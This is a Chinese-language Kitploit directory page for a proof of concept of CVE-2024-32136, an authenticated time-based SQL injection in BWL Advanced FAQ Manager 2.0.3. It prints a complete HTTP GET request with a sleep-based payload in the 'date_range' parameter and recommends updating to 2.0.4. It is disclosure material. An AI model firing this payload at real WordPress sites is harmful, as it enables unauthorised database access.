Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-32136 — CVE-2024-32136的概念验证漏洞利用程序,针对BWL Advanced FAQ Manager 2.0.3中的认证后SQL注入漏洞,演示了通过'date_range'参数进行基于时间的数据库操纵。 | Kitploit
工具/GitHubGitHub/xbz0n/cve-2024-32136
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试数据库安全
GitHubxbz0n/cve-2024-32136

CVE-2024-32136

CVE-2024-32136的概念验证漏洞利用程序,针对BWL Advanced FAQ Manager 2.0.3中的认证后SQL注入漏洞,演示了通过'date_range'参数进行基于时间的数据库操纵。

查看仓库
322年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

BWL Advanced FAQ Manager 2.0.3 - 认证后SQL注入

漏洞标题: BWL Advanced FAQ Manager 2.0.3 - 认证后SQL注入
日期: 2024年4月14日
漏洞作者: Ivan Spiridonov (xbz0n)
软件链接: https://codecanyon.net/item/bwl-advanced-faq-manager/5007135
版本: 2.0.3
测试环境: Ubuntu 20.04
CVE: CVE-2024-32136

SQL注入

SQL注入是一种安全漏洞,允许攻击者干扰应用程序的数据库查询。它通常涉及通过客户端输入数据向应用程序插入或“注入”SQL查询。成功的SQL注入漏洞利用可以读取数据库中的敏感数据、修改数据库数据(插入/更新/删除)、执行数据库管理操作(例如关闭DBMS)、恢复DBMS文件系统中存在的指定文件的内容,并且在某些情况下,还可以向操作系统发出命令。

受影响组件

  • 插件: BWL Advanced FAQ Manager
  • 版本: 2.0.3
  • 受影响参数: 'date_range'
  • 受影响页面: /wp-admin/edit.php

描述

该漏洞存在于 BWL Advanced FAQ Manager 插件 'bwl-advanced-faq-analytics' 页面使用的 'date_range' 参数中。经过身份验证的攻击者可以通过操纵此参数的输入来在数据库中执行任意SQL命令。

概念验证(PoC)

手动利用

以下 GET 请求演示了该漏洞:

root@kitploit:~
GET /wp-admin/edit.php?page=bwl-advanced-faq-analytics&post_type=bwl_advanced_faq&filter_type=views&date_range=(select*from(select(sleep(20)))a)&faq_id=all HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://localhost/wp-admin/edit.php?post_type=bwl_advanced_faq&page=bwl-advanced-faq-analytics
Connection: close
Cookie: [Relevant Cookies]
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

如果服务器响应延迟大约20秒,则表示基于时间的SQL注入漏洞利用成功,从而确认该漏洞。

修复建议

建议 BWL Advanced FAQ Manager v2.0.3 的用户将插件更新到修复版本 v2.0.4。

下载工具